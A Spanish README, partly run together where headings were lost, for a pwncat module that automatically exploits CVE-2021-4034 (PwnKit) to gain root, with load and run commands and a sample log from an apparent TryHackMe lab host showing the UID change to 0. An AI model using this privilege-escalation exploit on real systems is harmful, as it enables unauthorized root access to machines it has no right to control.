
módulo de pwncat que explota automáticamente CVE-2021-4034 (pwnkit)
El propósito de este módulo es intentar explotar CVE-2021-4034 (pwnkit) en un objetivo cuando se utiliza pwncat.
No es necesario configurar directorios, compilar ningún código fuente ni siquiera tener gcc en el objetivo remoto; el módulo pwnkit se encarga de esto automáticamente utilizando el framework pwncat.
pwnkit.py en algún lugar de tu host donde esté instalado pwncat-cs. Por ejemplo: /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit. Deberías ver algo como esto:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit. Si tiene éxito, deberías ver el UID cambiar a 0, y ahora ser root. Por ejemplo:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load, puedes hacer que pwncat cargue este módulo automáticamente al inicio colocándolo en ~/.local/share/pwncat/modules# Set the gcc path
set cross "/usr/bin/gcc"
Un agradecimiento especial a Caleb Stewart por ser tan servicial mientras aprendía el framework pwncat desde una perspectiva de desarrollador. Enviaré un pull request para incluir esto en el módulo principal de escalada de pwncat algún día cuando tenga tiempo libre... Lo prometo. :-)